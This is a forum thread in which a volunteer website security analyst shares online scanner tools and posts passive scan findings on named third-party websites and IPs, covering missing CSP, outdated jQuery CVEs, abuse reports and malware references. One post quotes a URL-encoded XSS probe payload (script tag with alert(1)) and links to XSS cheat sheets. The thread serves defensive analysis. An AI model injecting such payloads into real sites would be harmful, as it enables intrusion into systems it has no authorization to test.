DOM-XSS issues: Results from scanning URL: hxtp://Fullzinfo.pw/assets/plugins/blockUI/jquery.blockUI.js
Number of sources found: 29
Number of sinks found: 8
&
Results from scanning URL: hxtp://Fullzinfo.pw/assets/js/ui-elements.js
Number of sources found: 117
Number of sinks found: 42

And coming round a full circle with this scan, bringing up 205 improvement hints (recommendations):
https://webhint.io/scanner/32cc2961-011f-49ff-860a-c78ab12eeeed

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 20, 2021, 02:30:50 PM
Online website scanners, they come and go.

Scan here to get quite a number of improvement recommendations, with: https://webhint.io/scanner
For Stack technology use: https://hexometer.com/stack-checker/
A general scanner you can find here: https://securityscan.getastra.com/security-audit?site
More or a less likewise scan: https://awesometechstack.com/products/website-analyzer/

But you also can use specific purpose scanners like CSP scanners, made by Google, VirusTotal.
Also search resources like URLHaus etc., through snort- & SNYK scanners,
jQuery library scanners (retire insecurity),
and DOM-XSS issue (sources & sinks) scanners.

Internet.nl: https://internet.nl
The Greenweb Foundation https://www.thegreenwebfoundation.org/
SecurityHeaders: http://securityheaders.com
Mozilla Observatory: https://observatory.mozilla.org
Guardian360 QuickScan https://quickscan.guardian360.nl
More into deep scanning, use Zap: https://www.zaproxy.org.

Through tools, using a.o. OpenVAS but also through using NMAP linked to a vulnerability database.

Read: https://securitytrails.com/blog/nmap-vulnerability-scan

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2021, 01:29:37 AM
Interesting test site: https://csreis.github.io/tests/cross-site-iframe.html
Code: [Select]
VM4 sandbox_bundle.js:15 (electron) Security Warning: webFrame.executeJavaScript was called without worldSafeExecuteJavaScript enabled. This is considered unsafe. worldSafeExecuteJavaScript will be
A browser test for https://build.chromium.org' LUCI Build

Fails at Refused to display 'htxps://accounts.google.com/ServiceLogin?service=ah&passive=true&continue=h…google.com/_ah/conflogin%3Fcontinue%3Dhtxps://chromium-status.appspot.com/' in a frame because it set 'X-Frame-Options' to 'deny'.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 03, 2021, 12:26:56 PM
Any known vulnerabilities - quick scan:
https://www.safetydetectives.com/vulnerability-tool/

0 issues found: SERVER DETAILS
Web Server:
cloudflare
IP Address:
104.26.13.84
Hosting Provider:
CLOUDFLARENET
Shared Hosting:
280 sites found (use Reverse IP to download list)
Site made in Word Press

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 04, 2021, 05:38:20 PM
Happy Easter Days to all of you, that are to read here now.

The Easter Bunny (Paashaas in Dutch) was intelli-skimming over the website security
of "www dot de wegwyzer dot nl.
It was not that bad as we thought it could be at the front-end no issues,
the back-end was another can of worms. :o

Main issue alerted by my DEVCON extension was: No Content Security Policy configured for this site.

At a first glance, I found -c0.wp.com, -i0.wp.com, -i1.wp.com and -i2.wp.com
-log7.js and -count7.pl from -CloudFlare.net and -c.statcounter.com/t.php XHR in appl/json.
All available through scan-results (special php dictionnairy used in the scanner to reveal this)

Could go over it with -semgrep.dev/s/we30 (online resource)

No retirable libraries: https://retire.insecurity.today/#!/scan/80c30f378317b2e6b7493461a4f674b86929efa1fd5609aa80cd164c34569fc3

But quite some issues at the back-end: https://www.shodan.io/host/84.244.181.151
Excessive server info proliferation there, Apache httpdVersion: 2 / HTTP/1.1 301 Moved Permanently

No direct issues flagged here: https://sitecheck.sucuri.net/results/www.dewegwyzer.nl
Nor here: at a Word Press security scan.

Some hints towards improvement:
https://webhint.io/scanner/c59d294a-27b6-4131-acde-229e9a779c33#category-security

F-grade here: https://observatory.mozilla.org/analyze/www.dewegwyzer.nl
Also: https://observatory.mozilla.org/analyze/www.dewegwyzer.nl#third-party

Then console info (Ctrl+Shift+I) from my browser (and developer extensions).

This is blocked for me inside my ungoogled chrome:
Quote
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-app.wts2.one/log7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
onLoadModule.js:72 ...Selector Finder is running...
/favicon.ico:1 Failed to load resource: the server responded with a status of 404 (Not Found)
Selector Finder is running Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
app.wts2.one/log7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
d3uvwl4wtkgzo1.cloudfront.net/e8af8301-45e2-41c6-9212-9421ce1b1dc7.js:1
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
onLoadModule.js:72 ...Selector Finder is running...
/favicon.ico:1 Failed to load resource: the server responded with a status of 404 (Not Found)
-content-script.js.mapped for me with Selector Finder in the dev. console.

Also consider info from this scan: https://urlscan.io/result/439d58a9-16c1-4867-a99f-4f55f6992ed5/

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 04, 2021, 11:32:57 PM
But there is more on this website's security, that may interest us.

NSA snooping secure? No. Who knows you are on this website?
 -app.wts2.one & -www.dewegwyzer.nl will know,
but with no secure tracker transmission that is.

Detected 1 link and/or script to 3rd parties with no integrity check being performed.

Javascript error: -https://www.statcounter.com/counter/counter.js   
File was not found, because err-blocked-by-client.

HTML
-www.dewegwyzer.nl/
5,978 bytes, 80 nodes

Javascript 8   (external 3, inline 5)
INLINE: (function() { // If GPC on, set DOM property to true if not
964 bytes (DOM-XSS issue?).

INLINE: !function(){let e=!1;function n(){if(!e){const n=document.createElement("meta");
613 bytes

INLINE: /* * This entire block is wrapped in an IIFE to prevent polluting the scope of
445,247 bytes

INLINE: var sc_project=12462450; var sc_invisible=1; var sc_security="c8e29d42"; var
94 bytes

-www.statcounter.com/counter/​counter.js
-app.wts2.one/​log7.js
-d3uvwl4wtkgzo1.cloudfront.net/​e8af8301-45e2-41c6-9212-9421ce1b1dc7.js
INLINE: var wts=document.createElement('script');wts.async=true; wts.src='-https://app.wt
176 bytes

CSS 1   (external 0, inline 1)
INLINE: a { text-decoration: none; }

Retire.js Did not recognize -https://app.wts2.one/count7.pl?2055386&3&&&&&%3CB%3EDE%20WEGWYZER%3C%2FB%3E&http%3A%2F%2Fwww.dewegwyzer.nl&&&741x604&_&0&&0&&0&0&&no&&&7.21&0.19675618019939423

-   -   Did not recognize -https://app.wts2.one/log7.js
31 bytes INJECTED LocalCDN(o) extension was enabled in the browser for me  ;)

CSP No Content Security Policy found - not verified by DNSSEC.

header -> secure setting only for access-control-allow=origin header.

Apache 2 headers not found vulnerable.  Zen Mate FW finds 100% content, nothing blocked.

So yes, it takes some time to evaluate, when one goes a error-hunting,

polonus (volunteer 3rd party cold reconnaissance website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2021, 12:57:36 PM
We have lost another fine online resource over the Easter week-end:
-https://domxssscanner.geeksta.net/

The service has been taken down and was archived by the developer.
See: https://wiki.mozilla.org/Security/B2G/JavaScript_code_analysis#DOM_XSS_Scanner

Now I use DOM based XSS finder extension for Chrome.

Could be great if this could be brought online: https://github.com/ajinabraham/Static-DOM-XSS-Scanner

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2021, 02:45:20 PM
But there is an alternative for white hat pentesters and error-hunters like me.
You have to register so these services won't be abused:

https://securityforeveryone.com/tools/all?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2021, 11:52:27 PM
Comparing the workings of Retire.js extension and DEVCOM Javascript Security extension.

For the same site:
Quote
Retire.js
jquery   1.7.2   Found in -https://www.security.nl/js/jquery/jquery.securitynl.js?1375741299<br>Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   

and  DEVCON's info
Quote
1   Outdated JavaScript Library
Outdated JavaScript libraries detected. jquery 1.7.2
medium : Selector interpreted as HTML
CVE-2012-6708
medium : 3rd party CORS request may execute
CVE-2015-9251
medium : jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
CVE-2019-11358
medium : Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
CVE-2020-11022
medium : Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
CVE-2020-11023

reported by retire.js
1   missing-content-security-policy
No Content Security Policy configured for this site.

DEVCOM has added CSP information.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 18, 2021, 02:19:57 PM
For developers: https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html

I check in developers console with my enhanced Tampermonkey script Malware Script Detector enhanced,
based on a once extension for the firefox browser, now no longer available.
Example
Quote
VM181:76 Syntax error @ "Malware Script Detector v 1.1 Enhanced"!
##########################
JSHINT output:
##########################

SyntaxError: Unexpected identifier
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (:2:115), <anonymous>:74:477)
    at Object.create (eval at exec_fn (:2:115), <anonymous>:76:193)
    at c (eval at exec_fn (:2:115), <anonymous>:15:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (:2:115), <anonymous>:13:165)
    at eval (eval at exec_fn (:2:115), <anonymous>:13:292)

See: https://owasp.org/www-community/attacks/DOM_Based_XSS

Checking also using THC Hydra local security. (3rd party cold recon testing) - using malzilla original browser.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 24, 2021, 01:12:58 PM
22 alternative search engines: https://kinsta.com/blog/alternative-search-engines/

On deep searching: https://www.searchlore.org/

F.R.A.V.I.A.'s legagcy online: https://www.aronetics.com/searchlores/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 27, 2021, 03:57:39 PM
Testing against blocking by Netcraft extension & Site report alerts:
https://gbhackers.com/top-500-important-xss-cheat-sheet/  (also using kitploit tampermonkey detection script)..
Also consider and see the naughty list: https://gist.github.com/richardevcom/c81c59f693b5c3c5de0445bdd2a73c47
Example, so see:
https://xss.cx/2011/10/22/ghdb/xss-http-header-location-response-splitting-javascript-injection-example-poc-report-01.html

Example: Netcraft Logo
Suspected XSS Attack

This page has been blocked by the Netcraft Extension.

Blocked URL: hxxp://bla-di-bla-news dot net/%3C!%20foo=%22%3E%3Cscript%3Ejavascript:alert(1)%3C/script%3E%22%3E

Kicking up a Rails exemption, app vulnerable? Well at least indicates a dangerous or potentially negative action

In most cases we will get a scan fail situation, or we get somewhat the wiser here:

jquery   3.2.1   Found in https://qmod.quotemedia.com/static/v1.3.0/dayyearrange,detailedquotetab,quotehead.js _____Vulnerability info:
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   1
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Errors:
Quote
SyntaxError: Unexpected string
  eval ()()
  :4:80()
  Object.t [as F_c] (:3:191)()
  Object.E_u (:4:244)()
  eval (eval at exec_fn (:2:115), :74:477)()
  Object.create (eval at exec_fn (:2:115), :76:193)()
  c (eval at exec_fn (:2:115), :15:231)()
  :4:80()
  i (eval at exec_fn (:2:115), :13:165)()
  eval (eval at exec_fn (:2:115), :13:292)()

SyntaxError: Invalid regular expression flags
  eval ()()
  :4:80()
  Object.t [as F_c] (:3:191)()
  Object.E_u (:4:244)()
  eval (eval at exec_fn (:2:115), :74:477)()
  Object.create (eval at exec_fn (:2:115), :76:193)()
  c (eval at exec_fn (:2:115), :15:231)()
  :4:80()
  i (eval at exec_fn (:2:115), :13:165)()
  eval (eval at exec_fn (:2:115), :13:292)()
Also see: -https://d1io3yog0oux5.cloudfront.net/_5abd5b5da664e1a491be32c4849e7435/vfc/files/theme/js/_js/all.js

Surroundings: https://sitereport.netcraft.com/netblock?q=AMAZO-CF,13.224.0.0,13.227.255.255

But anyhow is seems this host is not vulnerable. No secure cookie attributes found.

However, SSL not supported -> https://sitereport.netcraft.com/?url=https://www.vfc.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 30, 2021, 04:47:58 PM
Additional layer of protection against XSS attacks offers a Content Security Policy:
https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
Check: https://cspvalidator.org/#url=https://cspvalidator.org/
and https://cspscanner.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 01:51:49 PM
Interesting resources: http://write.flossmanuals.net/basic-internet-security/introduction/

We have already lost and will loose a lot of fine online resources over time,
because maintainers struggle to pay for server services.

Recent examples: https://geeksta.net/domxssscanner/  is now history.
Almost history and shutting down: https://retire.insecurity.today/

Now we have to work extensions, developer tools,
but we do not always want to visit particular suspicious of payload laden malicious websites, do we, folks?
So I use my own tweaked version of Bobby's sand-boxed malzilla browser (preferably on a stand-alone comp).

Also time to read here: https://riseup.net/en/security/resources
(this in the light of the tails website that is down at the moment)
also: https://www.reddit.com/r/tails/comments/n22ymd/is_tails_website_down/gwhr47k/

When the going gets narrow, keep an eye on the sparrow, the song says,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 06:53:38 PM
But for a website we have security issues for that particular website - ->
https://awesometechstack.com/analysis/website/aeiou.pt/
See also scan results at: https://urlscan.io/result/ef728587-3b9d-40ca-aea2-32a6c4c5f67b/
And also do we have to consider the vulnerabilities on the hosting party nginx driven - webserver:
https://www.shodan.io/host/195.170.168.62 e.g. for -http://ajuda.aeiou.pt/xmlrpc.php
and https://www.shodan.io/host/172.217.164.134 *

We should not have access to for instance "/bla/index_deafaultpage.html" & blog/idem
or xekmail/_index_defaultpage.html or GET "/xmlrpc.php? rsd  on that nginx server with wp-content and wp includes.

We also should check: -http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
See TLS recommendations: https://sitecheck.sucuri.net/results/www.aeiou.pt

See the complete scan info: https://retire.insecurity.today/#!/scan/e1369956b7a8dc3e43e3066331308ee19372ec97b6b79f6f529659d8a199c9e1
See for instance: -https://s0.2mdn.net/ads/studio/Enabler.js * etc.   
Issued by Google Trust Services.. (no vulnerable libraries detected).

Thanks go out to Erlend Oftedal from Norway for his continuous resources on Retire.JS,
and the resources at retire insecurity to-day.
He helped a lot of people here and website admins through his scan results, reported on these forums.
We owe him a lot,

polonus a.k.a. Damian (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 10:02:02 PM
Compare to the F-grade scan results here: https://observatory.mozilla.org/analyze/ajuda.aeiou.pt
This site uses an untrusted or invalid certificate.

The following results ignore this error:
https://observatory.mozilla.org/analyze/ajuda.aeiou.pt#tls

F-grade and x-results: https://observatory.mozilla.org/analyze/ajuda.aeiou.pt#third-party

T-rating: https://www.ssllabs.com/ssltest/analyze?d=ajuda.aeiou.pt

CSP scan results:
Quote
URL
-http://ajuda.aeiou.pt/

No CSP
F
Result
CSP Protection None
CSP Reporting  Missing
CSP Validity     Invalid
XSS                 No CSP Protection
Clickjacking      No CSP Protection
Formjacking      No CSP Protection
General            No CSP Protection
Summary
13 Fatal Errors
16 Warnings
5 Info
0 Valid
Content Security Policy (CSP)

Probably blocked by user: JavaScript error message: File not found:
-http://d3uvwl4wtkgzo1.cloudfront.net/e8af8301-45e2-41c6-9212-9421ce1b1dc7.js

TypeError: Cannot read property 'fn' of undefined
 chrome-extension://lcmaikahgebmdmnckjbaikfllpmgabei/detection/script.js:28 patch()
 chrome-extension://lcmaikahgebmdmnckjbaikfllpmgabei/detection/script.js:64
 chrome-extension://lcmaikahgebmdmnckjbaikfllpmgabei/detection/script.js:65

Otto extension gives 4 issues for weak security:
Quote
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
Medium Severity
: CVE-2019-11358
Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Medium Severity
: CVE-2020-11022
Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
Medium Severity
: CVE-2020-11023
Content Security Policy
No Content Security Policy configured for this site. Create one now

SSL Tracking security:
Quote
This website is insecure.
66% of the trackers on this site could be protecting you from NSA snooping. Tell -aeiou.pt to fix it.

 All trackers
At least 3 third parties know you are on this webpage.

 -Google
 -Google
-ajuda.aeiou.pt -ajuda.aeiou.pt

Good thing site kicks up 100% content.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2021, 10:22:26 PM
Public scan report IP's (however now no longer online) could lead to abuse reports.

Let us strat from one random example at urlscan.io ->
https://urlscan.io/result/720315e3-d0b9-4d51-8647-3c5f317dafa1/

and then we stumble at abuse mentioned here: https://www.abuseipdb.com/check/185.199.108.153
also re: https://www.shodan.io/host/185.199.108.153

before we lang here at this abuse report: https://ip-46.com/185.199.108.153
Comodo is the one to confirm here: https://www.virustotal.com/gui/url/94073c941a6785806789528369b19c49bead1cc054443bf07273894ef7925ceb/detection

See Fastly abuse: https://www.virustotal.com/gui/ip-address/185.199.108.153/relations

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2021, 05:13:39 PM
Going through a long list of tor abusers, well, see the index here: http://www.kilitary.ru/tor.db/

Then check here: https://www.abuseipdb.com/check/104.244.73.43 &  here: https://ip-46.com/193.31.24.154

Experiences can be "mixed": https://community.torproject.org/relay/community-resources/good-bad-isps/
Also use this checker: https://www.getipintel.net/free-proxy-vpn-tor-ip-lookup/#web
and
https://www.ipqualityscore.com/tor-ip-address-check

Bad high risk IP address: https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/lookup/193.31.24.154

Interesting -> https://iplists.firehol.org/?ipset=stopforumspam_365d

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 05, 2021, 06:55:10 PM
Abuse and insecurity often will go hand in hand.

Banned as a web forum spammer: https://ip-46.com/185.32.221.247  (with 2 distinct reports and banned here as well),
Now see the many vulnerabilities at the base of this IP: Swiss ISP - Xelon AG: https://www.shodan.io/host/185.32.221.247
-> https://www.ip-tracker.org/locator/ip-lookup.php?ip=185.32.221.247

Executables detected coming from this IP - 2 flags: https://www.virustotal.com/gui/ip-address/185.32.221.247/relations

Lists: https://fspamlist.com/  &  https://github.com/kambrium/apache-referrer-spam-blacklist  &
random example: https://ip-46.com/27.68.13.2

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 06, 2021, 03:05:34 PM
Tor Project has started a consensus statuspage for tor users. Downtimes will now be published.

Nice to compare: http://128.31.0.13/tor/status-vote/current/consensus
to Ukranian resource: https://kilitary.ru/tor.db/128.31.0.13/1932848058.txt

polonus (volunteer 3rd party cold reconnaissance website security-analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2021, 02:42:54 PM
While this IP was reported top be a wbeforum spam address, it still has not entered here:
https://scamalytics.com/ip/203.192.236.2  score: 3

Similar story and a 5 score: https://scamalytics.com/ip/157.46.210.58
This tor-exit-node missed alltogether: https://scamalytics.com/ip/185.200.100.255

So we have to test online services first before we recommend to use them.
Re: https://sitereport.netcraft.com/?url=https://scamalytics.com
But given the all green here: https://www.site24x7.com/tools/public/t/results-1609429926193.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2021, 01:00:16 PM
Resources next to URLHaus -> https://urlhaus.abuse.ch/
ThreatFox Indicators of Compromise -> https://threatfox.abuse.ch/
Most seen malware is Dridex
There is even a trend-tracker for it at: https://any.run/malware-trends/dridex
Quote
Dridex is a very evasive and technically complex banking Trojan. Despite being based on a relatively old malware code, it was substantially updated over the years and became capable of using very effective infiltration techniques that make this malware especially dangerous.

 Type        Trojan
 Origin       ex-USSR territory
 First seen  1 January, 2014
  See example: https://ip-46.com/178.175.47.124#ip-feeds
See: https://www.virustotal.com/gui/file/2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6/relations  and Malicious URL - -http://178.175.84.253:34009/Mozi.a (and relations when you click it in VT) - avast detects this as Other:Malware-gen [Trj]

Number of malicious IPs given per AS: https://abuse.ch/blog/how-to-takedown-100000-malware-sites/
which we do not find here: https://ipinfo.io/AS60144 nor here: https://dnslytics.com/bgp/as60144

Additionally Malware URLs per AS: https://www.malwareurl.com/ns_listing.php?as=as13335  (nr. 9 in the 10 worst's list).
And another resource on bots: http://botscout.com/countrycheck.htm?cc=eu
And other resources: https://tria.ge/210104-ypkaw5zann

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2021, 02:57:29 PM
Two other resources that will produce interesting results when combined...

Started here: https://scanurl.net/u/about-me-tracy-vox
and checked also here:

Then analyzed here: https://www.convertcsv.com/url-extractor.htm
producing
Quote
-http://www.w3.org/2000/svg
-https://4e376b84dfa54d438285936f87ce3cfe@o477720.ingest.sentry.io/5525987
-https://about.me
-https://about.me/cdn-cgi/image/q=40,dpr=2,f=auto,fit=cover,w=120,h=120,gravity=auto/
-https://assets.about.me/background/users/t/r/a/tracy.vox_1620422403_437.jpg);background-size:cover;border-radius:50%;background-repeat:no-repeat;background-position:center
-https://about.me/cdn-cgi/image/q=80,dpr=1,f=auto,fit=cover,w=1024,h=512,gravity=auto/
-https://assets.about.me/background/users/t/r/a/tracy.vox_1620422403_437.jpg
-https://about.me/cdn-cgi/image/q=80,dpr=1,f=auto,fit=cover,w=1200,h=630,gravity=auto/
-https://assets.about.me/background/users/t/r/a/tracy.vox_1620422403_437.jpg
-https://about.me/s3/h/f0747898.bundle.js
-https://about.me/s3/h/favicon/favicon_150.d261ba02.png
-https://about.me/s3/h/favicon/favicon_180.dc2f5125.png
-https://about.me/s3/h/favicon/favicon_192.ff6ea21d.png
-https://about.me/s3/h/favicon/favicon_310.ea4f99c7.png
-https://about.me/s3/h/favicon/favicon_48.d67d3678.png
-https://about.me/s3/h/favicon/favicon_70.28088041.png
-https://about.me/s3/h/favicon/favicon_pad_310.577553f3.png
-https://about.me/s3/h/favicon/favicon_wide_310.fc8d8a1c.png
-https://about.me/s3/h/fonts/0de1fd16/proximanova-light-webfont.woff2)
-https://about.me/s3/h/fonts/18840092/proximanova-bold-webfont.woff)
-https://about.me/s3/h/fonts/1c4bdc94/proxima_nova_bold-punc.woff)
-https://about.me/s3/h/fonts/3162eabc/proximanova-light-webfont.woff)
-https://about.me/s3/h/fonts/446a8655/proximanova-regular-webfont.eot);src:url(
-https://about.me/s3/h/fonts/446a8655/proximanova-regular-webfont.eot?#iefix)
-https://about.me/s3/h/fonts/446d87b2/proximanova-regularit-webfont.woff2)
-https://about.me/s3/h/fonts/4e689305/proximanova-boldit-webfont.woff)
-https://about.me/s3/h/fonts/55d97647/proxima_nova_reg-latin-a.woff)
-https://about.me/s3/h/fonts/5f8a9596/proximanova-light-webfont.ttf)
-https://about.me/s3/h/fonts/67ff3116/proximanova-regular-webfont.woff2)
-https://about.me/s3/h/fonts/6afe9cab/proxima_nova_bold-punc.woff2)
-https://about.me/s3/h/fonts/6bc63717/proxima_nova_reg-latin-a.ttf)
-https://about.me/s3/h/fonts/78ff1c44/proxima_nova_bold-latin-a.woff)
-https://about.me/s3/h/fonts/7a3ae241/aboutme-glyphs.eot);src:url(
-https://about.me/s3/h/fonts/7a3ae241/aboutme-glyphs.eot?#iefix)
-https://about.me/s3/h/fonts/878abefb/proxima_nova_reg-punc.woff)
-https://about.me/s3/h/fonts/8865257a/proximanova-boldit-webfont.woff2)
-https://about.me/s3/h/fonts/89ad90f5/aboutme-glyphs.svg#aboutme-glyphs)
-https://about.me/s3/h/fonts/8d2eb294/proxima_nova_reg-punc.eot);src:url(
-https://about.me/s3/h/fonts/8d2eb294/proxima_nova_reg-punc.eot?#iefix)
-https://about.me/s3/h/fonts/90614a27/aboutme-glyphs.woff2)
-https://about.me/s3/h/fonts/98a24a02/proximanova-boldit-webfont.ttf)
-https://about.me/s3/h/fonts/9a6f654a/aboutme-glyphs.ttf)
-https://about.me/s3/h/fonts/9f33e797/proximanova-regularit-webfont.ttf)
-https://about.me/s3/h/fonts/a58c0527/proximanova-regular-webfont.woff)
-https://about.me/s3/h/fonts/a8b3a2fe/proxima_nova_reg-punc.ttf)
-https://about.me/s3/h/fonts/a9081ae3/proxima_nova_bold-punc.eot);src:url(-
-https://about.me/s3/h/fonts/a9081ae3/proxima_nova_bold-punc.eot?#iefix)
-https://about.me/s3/h/fonts/ac72b622/proximanova-regularit-webfont.woff)
-https://about.me/s3/h/fonts/b2fe8d73/proxima_nova_bold-latin-a.eot);src:url(
-https://about.me/s3/h/fonts/b2fe8d73/proxima_nova_bold-latin-a.eot?#iefix)
-https://about.me/s3/h/fonts/bdda97d2/aboutme-glyphs.woff)
-https://about.me/s3/h/fonts/c9531d96/proximanova-regular-webfont.ttf)
-https://about.me/s3/h/fonts/cacc884f/proximanova-bold-webfont.ttf)
-https://about.me/s3/h/fonts/cc630a6d/proximanova-light-webfont.eot);src:url(
-https://about.me/s3/h/fonts/cc630a6d/proximanova-light-webfont.eot?#iefix)
-https://about.me/s3/h/fonts/cd155566/proximanova-bold-webfont.woff2)
-https://about.me/s3/h/fonts/ce68a1f3/proxima_nova_bold-latin-a.ttf)
-https://about.me/s3/h/fonts/d532abe1/proxima_nova_reg-latin-a.eot);src:url(
-https://about.me/s3/h/fonts/d532abe1/proxima_nova_reg-latin-a.eot?#iefix)
-https://about.me/s3/h/fonts/d816599b/proxima_nova_bold-punc.ttf)
-https://about.me/s3/h/fonts/df54612c/proximanova-boldit-webfont.eot);src:url(
-https://about.me/s3/h/fonts/df54612c/proximanova-boldit-webfont.eot?#iefix)
-https://about.me/s3/h/fonts/e058ee6c/proximanova-regularit-webfont.eot);src:url(
-https://about.me/s3/h/fonts/e058ee6c/proximanova-regularit-webfont.eot?#iefix)
-https://about.me/s3/h/fonts/e5377b0e/proxima_nova_bold-latin-a.woff2)
-https://about.me/s3/h/fonts/f14f1eb6/proximanova-bold-webfont.eot);src:url(
-https://about.me/s3/h/fonts/f14f1eb6/proximanova-bold-webfont.eot?#iefix)
-https://about.me/s3/h/fonts/f46468a1/proxima_nova_reg-latin-a.woff2)
-https://about.me/s3/h/fonts/fea9be33/proxima_nova_reg-punc.woff2)
-https://about.me/s3/h/z/proxima_nova_bold-latin-a.827d4bfb.svg#proxima_novabold)
-https://about.me/s3/h/z/proxima_nova_reg-latin-a.30bcf879.svg#proxima_novaregular)
-https://about.me/s3/h/z/proximanova-bold-webfont.e99b8cdf.svg#proxima_novabold)
-https://about.me/s3/h/z/proximanova-boldit-webfont.d4eed10d.svg#proxima_novabold_italic)
-https://about.me/s3/h/z/proximanova-light-webfont.083d8df5.svg#proxima_novalight)
-https://about.me/s3/h/z/proximanova-regular-webfont.f142eece.svg#proxima_novaregular)
-https://about.me/s3/h/z/proximanova-regularit-webfont.767b818c.svg#proxima_novaitalic)
-https://about.me/tracy.vox
-https://api.about.me
-https://assets.about.me/background/users/t/r/a/tracy.vox_1620422403_437.jpg
-https://dw.about.me
-https://images.about.me
-https://jwqebx.shewantyou.net/c/da57dc555e50572d?s1=99832&amp;s2=1186447&amp;s3=Inst&amp;click_id=Inst&amp;j1=1&amp;j3=1
-https://use.typekit.net/geu7rrs.css
-https://www.google-analytics.com/analytics.js
-https://www.google.com/recaptcha/api.js

Results true: https://transparencyreport.google.com/safe-browsing/search?url=lmwll.shewantyou.net
While DrWeb flags IP: https://www.virustotal.com/gui/ip-address/54.205.191.137/detection
Amazonaws abuse: see Google results, a.o. https://www.google.com/url?client=internal-element-cse&cx=003414466004237966221:dgg7iftvryo&q=https://www.abuseipdb.com/check/54.205.191.137&sa=U&ved=2ahUKEwjimY-AlLrwAhUgwQIHHUOyC5EQFjAAegQIAxAB&usg=AOvVaw2nP5AHavAX-cyqKpwj489R

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 11, 2021, 06:08:16 PM
Combining resources on a malicious IP.
Re: https://ip-46.com/45.127.98.237
Re: https://viz.greynoise.io/ip/45.127.98.237
Re: https://beta.shodan.io/host/45.127.98.237
Re: https://secure.dshield.org/ipdetails.html?ip=45.127.98.237&1  (data for research purposes only)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 13, 2021, 01:17:34 PM
Website with recent data leaks. Related to a hypernode glitch?
Re: https://www.magereport.com/scan/?s=https://www.serverkast.com/

<iframe src="hxtps://www.googletagmanager.com/ns.html?id=GTM-MQCQSDP" height="0" width="0" style="display:none;visibility:hidden"></iframe>
Just a note, social media buttons often show up here. They are probably OK.

Link check: https://urlextractor.net/?target_url=https%3A%2F%2Fwww.serverkast.com%2F&href=1&link_type=all&image=1&meta=1&extract=Extract+Links

See: https://webhint.io/scanner/208f611c-d4ac-4a9e-87d3-4cace8f39ab5  (48 hints)

See: https://awesometechstack.com/analysis/website/serverkast.com/?protocol=https%3A

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2021, 12:26:02 PM
Checking on malicious chrome extensions with crxcavator.

Example for The Microsoft Authenticator (not by MS): https://crxcavator.io/source/mabdjppmcjpjploliggpbonahnjjlgkf/1.1.0?file=manifest.json&platform=Chrome

Info credits go here: https://www.theregister.com/2021/05/19/chrome_extension_microsoft_authenticator_fake/?td=keepreading-btm

